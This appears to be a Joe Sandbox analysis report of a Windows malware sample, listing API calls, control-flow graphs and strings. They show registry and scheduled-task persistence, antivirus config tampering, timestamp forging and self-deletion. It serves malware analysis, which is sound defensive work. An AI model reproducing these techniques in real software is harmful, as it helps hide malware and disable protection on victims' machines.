                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 239 401000-401011 240 401017-40101a 239->240 241 40113c-401141 239->241 240->241 242 401020-401022 240->242 242->241 243 401028-401044 CreateFileA 242->243 244 401139 243->244 245 40104a-401051 call 401e00 243->245 244->241 248 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 245->248 249 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 245->249 248->249 252 40106a-401089 GetSecurityDescriptorSacl 248->252 250 401105 249->250 251 4010f5-401103 SetEndOfFile 249->251 253 401108-401111 250->253 251->250 251->253 254 4010a0-4010a4 LocalFree 252->254 255 40108b-40109a SetNamedSecurityInfoA 252->255 256 401113-401120 GetHandleInformation 253->256 257 40112f-401136 253->257 254->249 255->254 256->257 258 401122-401126 256->258 258->257 259 401128-401129 CloseHandle 258->259 259->257
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 260 402930-40296f RegCreateKeyExA 261 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 260->261 262 4029fd-402a1e RegCreateKeyExA 260->262 263 4029e0-4029e5 261->263 264 402a20-402a22 262->264 265 402a44-402a4a 262->265 263->263 266 4029e7-4029fb 263->266 267 402a25-402a2a 264->267 268 402a4c-402a57 RegFlushKey RegCloseKey 265->268 269 402a5d-402a60 265->269 270 402a3e RegSetValueExA 266->270 267->267 271 402a2c-402a3d 267->271 268->269 270->265 271->270
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 346 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 347 401533-401543 346->347 348 40158f-401597 346->348 349 401545-40154e GetHandleInformation 347->349 350 40155d-401567 347->350 349->350 351 401550-401554 349->351 352 401581-40158c 350->352 353 401569-401572 GetHandleInformation 350->353 351->350 354 401556-401557 CloseHandle 351->354 353->352 355 401574-401578 353->355 354->350 355->352 356 40157a-40157b CloseHandle 355->356 356->352
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 357 401be0-401c0c CreateFileA 358 401c12-401c2e GetFileTime 357->358 359 401ca5-401caa 357->359 360 401c30-401c3d GetHandleInformation 358->360 361 401c4c-401c69 CreateFileA 358->361 360->361 362 401c3f-401c43 360->362 361->359 363 401c6b-401c87 SetFileTime 361->363 362->361 364 401c45-401c46 CloseHandle 362->364 363->359 365 401c89-401c96 GetHandleInformation 363->365 364->361 365->359 366 401c98-401c9c 365->366 366->359 367 401c9e-401c9f CloseHandle 366->367 367->359
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                              • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <Actions , xrefs: 0040380A
                                                                                                                                                                                                              • task%d, xrefs: 0040365C
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                              • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                              • 00-->, xrefs: 0040383F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1561668989
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,77305430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
